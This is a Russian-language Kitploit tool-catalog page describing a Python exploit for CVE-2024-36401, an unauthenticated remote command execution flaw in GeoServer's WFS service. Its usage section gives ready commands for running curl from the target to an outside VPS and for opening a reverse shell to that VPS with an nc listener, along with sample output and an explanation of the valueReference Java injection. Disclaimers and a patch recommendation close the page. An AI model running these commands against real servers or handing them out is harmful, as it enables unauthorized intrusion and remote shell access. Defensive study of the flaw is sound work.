Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-36401 — Python-эксплойт для "GeoServer" | Kitploit
Инструменты/GitHubGitHub/urjack2025/cve-2024-36401
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеИнструмент Удаленного Доступа
GitHuburjack2025/cve-2024-36401

CVE-2024-36401

Python-эксплойт для "GeoServer"

Репозиторий
210 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-36401 Инструмент для эксплуатации уязвимости GeoServer

Обзор уязвимости

CVE-2024-36401 — это уязвимость удаленного выполнения команд в GeoServer. Злоумышленник может выполнить произвольные команды без авторизации, отправив специально сформированный запрос WFS (Web Feature Service).

Требования к окружению

  • Python 3.x
  • Установить необходимые зависимости: pip install requests

Использование

Инструмент поддерживает два режима: cmd (непосредственное выполнение команд) и reverse (установка обратной оболочки).

1. Проверка доступности цели к внешней сети

Предположим, адрес VPS — 111.46.112.85. Используйте режим cmd для выполнения команды curl, чтобы проверить, может ли целевой сервер получить доступ к внешней сети:

root@kitploit:~
python exp.py cmd "8.147.134.121:32831" "curl http://111.46.112.85:8090/hello"

Метод проверки: Запустите HTTP-сервер на VPS для приема запросов

root@kitploit:~
# Выполнить на VPS
python -m http.server 8090

При успешном получении ответа вы увидите примерно следующее:

root@kitploit:~
Serving HTTP on 0.0.0.0 port 8090 (http://0.0.0.0:8090/) ...
39.106.20.178 - - [04/Oct/2025 17:22:30] code 404, message File not found
39.106.20.178 - - [04/Oct/2025 17:22:30] "GET /hello HTTP/1.1" 404 -

2. Установка обратного соединения (reverse shell)

Используйте режим reverse для установки обратной оболочки на указанный VPS и порт:

Шаг 1: Настройте прослушивание порта на VPS

root@kitploit:~
# Выполнить на VPS
nc -lvp 6666

Шаг 2: Запустите эксплойт для инициирования обратного соединения

root@kitploit:~
python exp.py reverse "8.147.134.121:32831" 111.46.112.85 6666

После выполнения инструмент покажет примерно такой вывод:

root@kitploit:~
[+] Response Status: 400
[+] Response Length: 1121
<?xml version="1.0" encoding="UTF-8"?><ows:ExceptionReport xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" version="2.0.0" xsi:schemaLocation="http://www.opengis.net/ows/1.1 http://8.147.134.121:32831/geoserver/schemas/ows/1.1.0/owsAll.xsd">
<ows:Exception exceptionCode="NoApplicableCode">
<ows:ExceptionText>java.lang.ClassCastException: class java.lang.ProcessImpl cannot be cast to class org.opengis.fea

В этот момент, если эксплуатация прошла успешно, nc-прослушиватель на VPS получит сессию обратной оболочки.

Описание параметров инструмента

root@kitploit:~
Usage:
  python exp.py cmd <target> <command>
  python exp.py reverse <target> <vps_ip> <vps_port>
  • cmd: режим выполнения одной команды
  • reverse: режим обратной оболочки
  • <target>: адрес и порт целевого сервера, формат ip:port
  • <command>: команда, выполняемая на целевом сервере
  • <vps_ip>: IP-адрес VPS-сервера
  • <vps_port>: порт прослушивания на VPS

Принцип уязвимости

Уязвимость использует недостаток безопасности в службе WFS GeoServer. Злоумышленник внедряет Java-код в параметр valueReference для выполнения системных команд. Инструмент формирует XML-полезную нагрузку с вредоносным кодом и отправляет её на интерфейс WFS GeoServer, что приводит к удаленному выполнению команд.

Примечания

  1. Данный инструмент предназначен только для исследований в области безопасности и проверки уязвимостей. Не используйте его для несанкционированного тестирования.
  2. Пользователь несет полную ответственность за любые последствия, возникшие в результате использования данного инструмента.
  3. При использовании функции обратной оболочки убедитесь, что у вас есть разрешение на доступ к целевой системе и что ваши действия разрешены в рамках применимого законодательства.
  4. В тестовой среде (например, на полигоне) организаторы могут изменить стандартные маршруты, чтобы усложнить задачу, что может привести к неработоспособности предоставленного эксплойта. В этом случае может потребоваться изменить поле /geoserver/wfs на соответствующее значение.

Рекомендации по исправлению

Своевременно обновляйте GeoServer до официальной безопасной версии и настраивайте сервер в соответствии с лучшими практиками безопасности.

Скачать инструмент